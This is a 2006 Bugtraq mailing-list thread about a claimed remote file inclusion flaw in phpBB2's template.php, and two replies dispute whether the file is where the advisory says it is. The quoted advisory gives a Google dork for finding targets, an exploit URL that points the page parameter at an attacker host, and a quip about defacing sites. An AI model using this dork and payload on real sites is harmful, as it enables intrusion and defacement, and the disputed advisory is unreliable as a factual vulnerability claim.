
Date: Mon, 5 Jun 2006 22:05:43 +0100
From: "Jessica Hope" <jessicasaulhope@...glemail.com>
To: bugtraq@...urityfocus.com
Subject: Re: phpBB2 (template.php) Remote File Inclusion


On the contaray, template.php is part of phpBB2, but unlike what this
"exploit" is saying, it isn't located in the root directory of a phpBB
install; it is located in /includes.

Jessica

On 6/5/06, ad@...poverflow.com <ad@...poverflow.com> wrote:
> template.php is an addon and not part of phpbb2, noobs....
>
>
> canberx@...uxmail.org wrote:
> > ********************************************************************
> >
> > *Title:
> >
> > *phpBB2 Remote File Include
> >
> > *
> >
> > *
> >
> > *Credit:
> >
> > *Canberx
> >
> > *
> >
> > *
> >
> > *Thanx:
> >
> > *Forewer-Partizan
> >
> > *
> >
> > *
> >
> > *Mail:
> >
> > *canberx@...uxmail.org    www.canberx.tk
> >
> > *
> >
> > *
> >
> > *Google Dork:
> >
> > *Powered by phpBB (c) 2001, 2002 phpBB Group
> >
> > *
> >
> > *
> >
> > *Exploit:
> >
> > *www.target.com/[path_to_phpbb]/template.php?page=[attacker]
> >
> > *
> >
> > *
> >
> > *********************************************************************
> >
> >
> > Plz Don't Hacked site if it already has been defaced :)
> >
> >
> > *********************************************************************
> >
> >
> > __________ NOD32 1.1578 (20060604) Information __________
> >
> > This message was checked by NOD32 antivirus system.
> > http://www.eset.com
> >
> >
> >
> >
>
>
>
>


